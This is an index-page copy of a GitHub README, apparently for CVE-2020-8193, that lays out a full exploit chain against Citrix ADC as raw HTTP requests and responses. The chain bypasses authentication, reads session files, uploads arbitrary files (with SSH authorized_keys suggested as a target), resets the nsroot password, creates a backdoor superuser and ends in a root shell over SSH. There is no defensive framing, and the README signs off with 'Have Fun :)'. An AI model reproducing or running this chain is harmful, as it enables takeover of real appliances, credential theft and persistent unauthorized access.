Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.
Awesome Lists | Featured Topics | Projects
https://github.com/Airboi/Citrix-ADC-RCE-CVE-2020-8193

Citrix ADC从权限绕过到RCE
https://github.com/Airboi/Citrix-ADC-RCE-CVE-2020-8193
Last synced: 21 days ago
JSON representation
Citrix ADC从权限绕过到RCE
Host: GitHub
URL: https://github.com/Airboi/Citrix-ADC-RCE-CVE-2020-8193
Owner: Airboi
Created: 2020-07-12T13:05:40.000Z (over 4 years ago)
Default Branch: master
Last Pushed: 2020-07-12T13:10:50.000Z (over 4 years ago)
Last Synced: 2024-08-05T17:30:38.507Z (4 months ago)
Homepage:
Size: 10.7 KB
Stars: 45
Watchers: 2
Forks: 7
Open Issues: 0
Metadata Files:
- Readme: README.md
Awesome Lists containing this project

awesome-hacking-lists - Airboi/Citrix-ADC-RCE-CVE-2020-8193 - Citrix ADC从权限绕过到RCE (Others)
README

        # Citrix ADC RCE 

## 0x01 CreateSession

`request`

```

POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1

Host: 192.168.3.18:9080

User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36 C845D9D38B3A68F4F74057DB542AD252 tx/2.0

Content-Length: 44

Accept-Encoding: gzip, deflate

Connection: close

Content-Type: application/xml

Range: bytes=0-102400

X-Nitro-Pass: jr9bt

X-Nitro-User: boej3

```

`response`

```

HTTP/1.1 406 Not Acceptable

Date: Sun, 12 Jul 2020 07:52:00 GMT

Server: Apache/2.4.34 (Unix)

Set-Cookie: SESSID=eb1780b044676f588dbcc2a6305f6b57; path=/; HttpOnly

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Content-Length: 4489

Connection: close

Content-Type: application/xml; charset=utf-8

An internal server error was encountered
An internal server error was encountered
An internal server error was encountered
An internal server error was encountered
An internal server error was encountered
An internal server error was encountered
An internal server error was encountered
An internal server error was encountered
An internal server error was encountered
An internal server error was encountered

-1MISMATCH_OBJECTNAME_ERRORERROR

An internal server error was encountered
An internal server error was encountered

-1MISMATCH_OBJECTNAME_ERRORERROR

An internal server error was encountered
An internal server error was encountered

-1MISMATCH_OBJECTNAME_ERRORERROR

An internal server error was encountered
An internal server error was encountered

-1MISMATCH_OBJECTNAME_ERRORERROR

An internal server error was encountered
An internal server error was encountered

-1MISMATCH_OBJECTNAME_ERRORERROR

```

## 0x02 fix session

`request`

```

GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1

Host: 192.168.3.18:9080

User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36 C845D9D38B3A68F4F74057DB542AD252 tx/2.0

Accept-Encoding: gzip, deflate

Connection: close

Cookie: SESSID=eb1780b044676f588dbcc2a6305f6b57

Range: bytes=0-102400

```

`response`

```

HTTP/1.1 302 Found

Date: Sun, 12 Jul 2020 07:54:31 GMT

Server: Apache/2.4.34 (Unix)

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate

Pragma: no-cache

Set-Cookie: is_cisco_platform=-1; expires=Wed, 07-Jul-2021 07:54:32 GMT; Max-Age=31104000; path=/; HttpOnly

Location: /menu/neo

Content-Length: 416

Connection: close

Content-Type: text/html; charset=UTF-8

An internal server error was encountered
An internal server error was encountered

```

## 0x03 Get rand_key

`request`

```

GET /menu/stc HTTP/1.1

Host: 192.168.3.18:9080

User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36 C845D9D38B3A68F4F74057DB542AD252 tx/2.0

Accept-Encoding: gzip, deflate

Connection: close

Cookie: SESSID=eb1780b044676f588dbcc2a6305f6b57; is_cisco_platform=-1

Range: bytes=0-102400

```

`response`

```

HTTP/1.1 206 Partial Content

Date: Sun, 12 Jul 2020 07:54:35 GMT

Server: Apache/2.4.34 (Unix)

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate

Pragma: no-cache

Vary: Accept-Encoding

Content-Range: bytes 0-4149/4150

Content-Length: 15501

Connection: close

Content-Type: text/html; charset=UTF-8

Citrix ADC - Statistics

//rand is used in utils.js in the URL to logout and in the URL to update NSAPI token

//rand_key & rand are used in utils.js to avoid CSRF in all POST requests

var rand = "181103693.1594540472072128";

var rand_key = "14247218531594540472072170";

var NSERR_SESSION_EXPIRED = 444;

...

Error retrieving data.
return code = 354.
Error message = Invalid username or password.


```

note: var rand = "181103693.1594540472072128";

## 0x04 re-break Session

`request`

```

POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1

Host: 192.168.3.18:9080

User-Agent: python-requests/2.20.0

Content-Length: 44

Accept-Encoding: gzip, deflate

Connection: close

Content-Type: application/xml

Cookie: SESSID=eb1780b044676f588dbcc2a6305f6b57; is_cisco_platform=-1

Range: bytes=0-102400

X-NITRO-USER: mMg96GTR

X-NITRO-PASS: QXom91tz

```

`response`

```

HTTP/1.1 406 Not Acceptable

Date: Sun, 12 Jul 2020 07:54:49 GMT

Server: Apache/2.4.34 (Unix)

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Content-Length: 4489

Connection: close

Content-Type: application/xml; charset=utf-8

An internal server error was encountered
An internal server error was encountered
An internal server error was encountered
An internal server error was encountered
An internal server error was encountered
An internal server error was encountered
An internal server error was encountered
An internal server error was encountered
An internal server error was encountered
An internal server error was encountered

-1MISMATCH_OBJECTNAME_ERRORERROR

An internal server error was encountered
An internal server error was encountered

-1MISMATCH_OBJECTNAME_ERRORERROR

An internal server error was encountered
An internal server error was encountered

-1MISMATCH_OBJECTNAME_ERRORERROR

An internal server error was encountered
An internal server error was encountered

-1MISMATCH_OBJECTNAME_ERRORERROR

An internal server error was encountered
An internal server error was encountered

-1MISMATCH_OBJECTNAME_ERRORERROR

```

## 0x05 Read Dir

`request`

```

POST /rapi/filedownload?filter=path:%2Fvar%2Fnstmp HTTP/1.1

Host: 192.168.3.18:9080

User-Agent: python-requests/2.20.0

Accept-Encoding: gzip, deflate

Accept: */*

Connection: close

Content-Type: application/xml

X-NITRO-USER: N6RRf049

X-NITRO-PASS: FcdXbqXr

rand_key: 32946879.1594556816473396

Cookie: SESSID=eb1780b044676f588dbcc2a6305f6b57; is_cisco_platform=0; startupapp=neo

Content-Length: 31

```

`response`

```

HTTP/1.1 406 Not Acceptable

Date: Sun, 12 Jul 2020 12:27:04 GMT

Server: Apache

X-Frame-Options: SAMEORIGIN

Expires: -1

Cache-Control: private, must-revalidate, post-check=0, pre-check=0

Pragma: private

Content-Disposition: attachment;filename="nstmp"

Accept-Ranges: bytes

Content-Length: 512

X-XSS-Protection: 1; mode=block

Keep-Alive: timeout=15, max=98

Connection: Keep-Alive

Content-Type: application/octet-stream

...

sess_6680400dad3be5585d4ac9880d5f634f...

sess_774dd8a02a254bd09c480cd0ba244598...

sess_6c5c31300c22b200f0273e7a13be47cb....

```

## 0x06 Read Session

`resquest`

```

POST /rapi/filedownload?filter=path:%2Fvar%2Fnstmp%2Fsess_6c5c31300c22b200f0273e7a13be47cb HTTP/1.1

Host: 192.168.3.18:9080

User-Agent: python-requests/2.20.0

Accept-Encoding: gzip, deflate

Accept: */*

Connection: close

Content-Type: application/xml

X-NITRO-USER: N6RRf049

X-NITRO-PASS: FcdXbqXr

rand_key: 32946879.1594556816473396

Cookie: SESSID=eb1780b044676f588dbcc2a6305f6b57; is_cisco_platform=0; startupapp=neo

Content-Length: 31

```

`response`

```

HTTP/1.1 406 Not Acceptable

Date: Sun, 12 Jul 2020 12:30:33 GMT

Server: Apache

X-Frame-Options: SAMEORIGIN

Expires: -1

Cache-Control: private, must-revalidate, post-check=0, pre-check=0

Pragma: private

Content-Disposition: attachment;filename="sess_6c5c31300c22b200f0273e7a13be47cb"

Accept-Ranges: bytes

Content-Length: 2162

X-XSS-Protection: 1; mode=block

Keep-Alive: timeout=15, max=100

Connection: Keep-Alive

Content-Type: application/octet-stream

NSAPI|s:254:"##703FFFA9A2E71F7435B67182A95E196770FF69246DB68B6BE92E825B8A520D00F1FCF6E23F897090DBDEDBE817FFE81D1501200A8BB36C9FFA176EDA41E473DC240A804B90B8BFE1EC30DA87C6FAD3261A8B3C09C7BB82F97DDB3DB41A69CA0B849AFD6B17827463358B700D5847F91F78619B8FA1A98ED4DED3509AB11C";NSAPI_DOMAIN|s:0:"";NSAPI_PATH|s:1:"/";login_warning|s:0:"";sysid|s:6:"450070";oemid|s:1:"0";superuser|s:4:"true";nsbw|i:0;ns_is_sgw|s:5:"false";nsbrandDesc|s:7:"ADC VPX";username|s:6:"nsroot";timezone_offset|i:28800;nsversion|s:63:" NS12.1: Build 55.13.nc, Date: Nov  4 2019, 22:20:18   (64-bit)";nsversion_error|b:0;ns_mode|i:2;nshostDesc|s:22:"49.234.251.224 (ADC01)";nsbrand|s:2:"NS";nsvpx|s:3:"VPX";ns_model|s:4:"1000";ns_aws_pin|s:0:"";ns_is_aws|s:5:"false";ns_is_azure|s:5:"false";ns_is_gcp|s:5:"false";rand|s:26:"845810655.1594556994263502";rand_key|s:26:"13590513441594556994263577";licenseMap|a:62:{s:2:"wl";b:1;s:2:"sp";b:1;s:2:"lb";b:1;s:2:"cs";b:1;s:2:"cr";b:1;s:2:"sc";b:1;s:3:"cmp";b:1;s:5:"delta";b:0;s:2:"pq";b:1;s:3:"ssl";b:1;s:4:"gslb";b:1;s:5:"gslbp";b:1;s:5:"hdosp";b:1;s:7:"routing";b:1;s:2:"cf";b:1;s:18:"contentaccelerator";b:0;s:2:"ic";b:0;s:6:"sslvpn";b:1;s:14:"f_sslvpn_users";s:4:"1000";s:11:"f_ica_users";s:1:"0";s:3:"aaa";b:1;s:4:"ospf";b:1;s:3:"rip";b:1;s:3:"bgp";b:1;s:7:"rewrite";b:1;s:6:"ipv6pt";b:1;s:5:"appfw";b:0;s:9:"responder";b:1;s:4:"agee";b:0;s:4:"nsxn";b:1;s:13:"htmlinjection";b:1;s:7:"modelid";s:4:"1000";s:4:"push";b:1;s:6:"wionns";b:1;s:7:"appflow";b:1;s:11:"cloudbridge";b:0;s:20:"cloudbridgeappliance";b:0;s:22:"cloudextenderappliance";b:0;s:4:"isis";b:1;s:7:"cluster";b:1;s:2:"ch";b:1;s:6:"appqoe";b:1;s:10:"appflowica";b:1;s:13:"isstandardlic";b:0;s:15:"isenterpriselic";b:1;s:13:"isplatinumlic";b:0;s:9:"issgwylic";b:0;s:8:"isswglic";b:0;s:4:"rise";b:1;s:3:"feo";b:1;s:3:"lsn";b:1;s:13:"licensingmode";s:5:"Local";s:16:"daystoexpiration";s:2:"50";s:8:"rdpproxy";b:1;s:3:"rep";b:0;s:12:"urlfiltering";b:0;s:17:"videooptimization";b:0;s:12:"forwardproxy";b:0;s:15:"sslinterception";b:0;s:23:"remotecontentinspection";b:1;s:11:"adaptivetcp";b:0;s:3:"cqa";b:0;}grouping_separator|s:1:",";decimal_separator|s:1:".";defaultpartition|s:7:"default";

```

## 0x07 UploadFile Getshell

You Can Upload to /root/.ssh/authorized_key

Note: Get rand_key & SESSID from file:`sess_[32charactor]`

`request`

```

POST /rapi/uploadtext HTTP/1.1

Host: 192.168.3.18:9080

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: https://citrix.local/menu/neo

DNT: 1

rand_key: 845810655.1594556994263502

Cookie: SESSID=6c5c31300c22b200f0273e7a13be47cb; startupapp=neo; is_cisco_platform=0; st_splitter=350px; rdx_pagination_size=25%20Per%20Page

Upgrade-Insecure-Requests: 1

Content-Type: application/x-www-form-urlencoded

Content-Length: 92

object={"uploadtext":{"filedir":"/tmp/","filedata":"123456","filename":"test123456789.txt"}}

```

`response`

```

HTTP/1.1 200 OK

Date: Sun, 12 Jul 2020 06:15:05 GMT

Server: Apache

X-Frame-Options: SAMEORIGIN

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate

Pragma: no-cache

X-XSS-Protection: 1; mode=block

Content-Length: 34

Content-Type: application/json; charset=utf-8

{"errorcode":"0","message":"Done"}

```

## 0x08 ChangePassword && SSH

`request`

```

PUT /nitro/v1/config/systemuser HTTP/1.1

Host: 192.168.3.18:9080

Content-Length: 83

Cache-Control: max-age=0

Accept: application/json

rand_key: 845810655.1594556994263502

NITRO_WEB_APPLICATION: true

If-Modified-Since: Thu, 01 Jan 1970 05:30:00 GMT

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

DNT: 1

Content-Type: application/json

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7

Cookie: is_cisco_platform=-1; rdx_pagination_size=25%20Per%20Page; SESSID=6c5c31300c22b200f0273e7a13be47cb; startupapp=neo

Connection: close

{"params":{"warning":"YES"},"systemuser":{"username":"nsroot","password":"boiboi"}}

```

`response`

```

HTTP/1.1 200 OK

Date: Sun, 12 Jul 2020 12:37:56 GMT

Server: Apache/2.4.34 (Unix)

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Content-Length: 57

Connection: close

Content-Type: application/json; charset=utf-8

{ "errorcode": 0, "message": "Done", "severity": "NONE" }

```

`SSH`

```bash

ssh [email protected]

###############################################################################

#                                                                             #

#        WARNING: Access to this system is for authorized users only          #

#         Disconnect IMMEDIATELY if you are not an authorized user!           #

#                                                                             #

###############################################################################

Password:

Last login: Sun Jul 12 14:12:44 2020 from 192.168.3.1

 Done

 > shell

Copyright (c) 1992-2013 The FreeBSD Project.

Copyright (c) 1979, 1980, 1983, 1986, 1988, 1989, 1991, 1992, 1993, 1994

	The Regents of the University of California. All rights reserved.

root@localhost

```

## 0x08 CreateUser && SSH

`request:CreateUser`

```

POST /nitro/v1/config/systemuser HTTP/1.1

Host: 192.168.3.18:9080

Content-Length: 83

Cache-Control: max-age=0

Accept: application/json

rand_key: 845810655.1594556994263502

NITRO_WEB_APPLICATION: true

If-Modified-Since: Thu, 01 Jan 1970 05:30:00 GMT

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

DNT: 1

Content-Type: application/json

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7

Cookie: is_cisco_platform=-1; rdx_pagination_size=25%20Per%20Page; SESSID=6c5c31300c22b200f0273e7a13be47cb; startupapp=neo

Connection: close

object={"params":{"warning":"YES"},"systemuser":{"username":"nsroot1","password":"nsroot1","timeout":"900","maxsession":"20","logging":"ENABLED","externalauth":"ENABLED"}}

```

`response:CreateUser`

```

HTTP/1.1 201 Created

Date: Sun, 12 Jul 2020 12:46:55 GMT

Server: Apache

X-Frame-Options: SAMEORIGIN

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Access-Control-Allow-Origin: *

Access-Control-Allow-Credentials: false

X-XSS-Protection: 1; mode=block

Content-Length: 57

Keep-Alive: timeout=15, max=100

Connection: Keep-Alive

Content-Type: application/json; charset=utf-8

{ "errorcode": 0, "message": "Done", "severity": "NONE" }

```

`request:binding superadmin policy`

```

POST /nitro/v1/config/systemuser_systemcmdpolicy_binding HTTP/1.1

Host: 192.168.3.18:9080

Content-Length: 83

Cache-Control: max-age=0

Accept: application/json

rand_key: 845810655.1594556994263502

NITRO_WEB_APPLICATION: true

If-Modified-Since: Thu, 01 Jan 1970 05:30:00 GMT

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

DNT: 1

Content-Type: application/json

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7

Cookie: is_cisco_platform=-1; rdx_pagination_size=25%20Per%20Page; SESSID=6c5c31300c22b200f0273e7a13be47cb; startupapp=neo

Connection: close

object={"params":{"warning":"YES"},"systemuser_systemcmdpolicy_binding":{"policyname":"superuser","priority":"0","username":"nsroot1"}}

```

`response:binding superadmin policy`

```

HTTP/1.1 201 Created

Date: Sun, 12 Jul 2020 12:55:27 GMT

Server: Apache

X-Frame-Options: SAMEORIGIN

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Access-Control-Allow-Origin: *

Access-Control-Allow-Credentials: false

X-XSS-Protection: 1; mode=block

Content-Length: 57

Keep-Alive: timeout=15, max=100

Connection: Keep-Alive

Content-Type: application/json; charset=utf-8

{ "errorcode": 0, "message": "Done", "severity": "NONE" }

```

`SSH`

```

ssh [email protected]

###############################################################################

#                                                                             #

#        WARNING: Access to this system is for authorized users only          #

#         Disconnect IMMEDIATELY if you are not an authorized user!           #

#                                                                             #

###############################################################################

Password:

Last login: Sun Jul 12 20:52:27 2020 from 47.75.37.35

 Done

> shell

Copyright (c) 1992-2013 The FreeBSD Project.

Copyright (c) 1979, 1980, 1983, 1986, 1988, 1989, 1991, 1992, 1993, 1994

	The Regents of the University of California. All rights reserved.

root@localhost#

```

Have Fun :)